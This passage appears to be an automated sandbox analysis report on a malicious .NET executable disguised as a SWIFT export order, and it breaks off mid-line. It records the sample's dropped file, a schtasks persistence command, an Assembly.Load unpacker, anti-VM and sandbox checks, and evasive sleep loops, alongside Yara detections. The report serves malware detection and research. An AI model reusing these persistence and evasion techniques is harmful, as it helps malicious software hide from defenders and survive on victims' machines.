Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Mutant created: \Sessions\1\BaseNamedObjects\Yjstdec
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6260:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_01
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe String found in binary or memory: /UTF8Encodi;component/views/addbook.xaml
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe String found in binary or memory: views/addcustomer.baml
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe String found in binary or memory: views/addbook.baml
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe String found in binary or memory: /UTF8Encodi;component/views/addcustomer.xaml
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe String found in binary or memory: Q/UTF8Encodi;component/views/addbook.xamlg/UTF8Encodi;component/views/borrowfrombookview.xaml]/UTF8Encodi;component/views/borrowingview.xamlW/UTF8Encodi;component/views/changebook.xaml_/UTF8Encodi;component/views/changecustomer.xaml[/UTF8Encodi;component/views/customerview.xaml_/UTF8Encodi;component/views/deletecustomer.xamlU/UTF8Encodi;component/views/errorview.xamlY/UTF8Encodi;component/views/smallextras.xamlY/UTF8Encodi;component/views/addcustomer.xaml
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe String found in binary or memory: *images/booksimage.jpg$views/addbook.baml1J,views/addcustomer.baml
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000003.262649422.0000000001200000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353122475.00000000013A0000.00000040.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353352126.00000000014BF000.00000040.00000001.sdmp, help.exe, help.exe, 00000014.00000002.506159305.000000000305F000.00000040.00000001.sdmp, help.exe, 00000014.00000002.505506351.0000000002F40000.00000040.00000001.sdmp
Source: Binary string: help.pdbGCTL source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp
Source: Binary string: help.pdb source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000008.00000002.353029451.0000000000F70000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: AnsPejV.exe.0.dr, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.7e0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.7e0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.7.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.3.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.0.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.9.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.2.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.1.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.8f0000.5.unpack, Biblan/Views/MainWindow.cs .Net Code: ObjectIdentifier System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 0_2_007E92F5 push ds; ret 0_2_007E9340
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 0_2_007E9361 push ds; retf 0_2_007E9364
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 0_2_007E9347 push ds; ret 0_2_007E934C
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 0_2_052A56E0 push esp; iretd 0_2_052A56E9
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041B842 push eax; ret 8_2_0041B848
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041B84B push eax; ret 8_2_0041B8B2
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041C871 push 67D4EBBAh; ret 8_2_0041BB0A
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_00415022 push ebx; ret 8_2_00415033
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041C027 push 67D4EBBAh; ret 8_2_0041BB0A
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041B8E6 push 67D4EBBAh; ret 8_2_0041BB0A
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041B8AC push eax; ret 8_2_0041B8B2
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_00406124 push edx; ret 8_2_0040612E
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041C196 push 67D4EBBAh; ret 8_2_0041BB0A
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_004151AC push 53C4372Dh; iretd 8_2_004151B9
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041BB0C push 67D4EBBAh; ret 8_2_0041BB0A
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_00419B23 push esp; iretd 8_2_00419B24
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041BC18 push 67D4EBBAh; ret 8_2_0041BB0A
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_00414CAE push ds; retf 8_2_00414CAF
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041C575 push 67D4EBBAh; ret 8_2_0041BB0A
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041C6BB push 67D4EBBAh; ret 8_2_0041BB0A
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041B7F5 push eax; ret 8_2_0041B848
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_008F92F5 push ds; ret 8_2_008F9340
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_008F9347 push ds; ret 8_2_008F934C
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_008F9361 push ds; retf 8_2_008F9364
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0141D0D1 push ecx; ret 8_2_0141D0E4
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02FBD0D1 push ecx; ret 20_2_02FBD0E4
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006CC871 push 67D4EBBAh; ret 20_2_006CBB0A
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006CB84B push eax; ret 20_2_006CB8B2
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006CB842 push eax; ret 20_2_006CB848
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006CC027 push 67D4EBBAh; ret 20_2_006CBB0A
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006C5022 push ebx; ret 20_2_006C5033
Source: initial sample Static PE information: section name: .text entropy: 7.85893644673

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe File created: C:\Users\user\AppData\Roaming\AnsPejV.exe

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 0.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.2cd9004.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: TT_SWIFT_Export Order_noref S10SMG00318021.exe PID: 3456, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000006B8614 second address: 00000000006B861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000006B89AE second address: 00000000006B89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -12912720851596678s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -240000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1064 Thread sleep count: 3989 > 30 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239828s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1064 Thread sleep count: 4346 > 30 Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 5664 Thread sleep time: -39327s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239718s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239609s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239497s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239370s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239263s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239152s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -239031s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238921s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238812s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238703s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238593s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238483s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238375s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238265s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238150s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -238045s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237937s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237828s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237718s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237609s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237499s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237390s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237281s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237171s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -237062s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236952s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236843s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236734s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236625s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236515s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236406s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236296s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236152s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -236046s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235937s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235828s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235718s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235609s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235500s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235390s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235281s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235141s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -235031s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234913s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234797s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234682s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234553s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234391s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234250s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234140s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -234012s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233898s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233750s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233640s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233529s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233421s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233312s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233203s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -233093s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232980s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232865s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232687s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232535s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232395s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -232268s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -230891s >= -30000s
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe TID: 1256 Thread sleep time: -230122s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6356 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6236 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340 Thread sleep count: 7185 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336 Thread sleep count: 1300 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6392 Thread sleep time: -7378697629483816s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_004088E0 rdtsc 8_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 240000
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239828
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239718
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239609
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239497
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239370
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239263
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239152
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 239031
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 238921
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 238812
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 238703
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: delay time: 238593
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Thread delayed: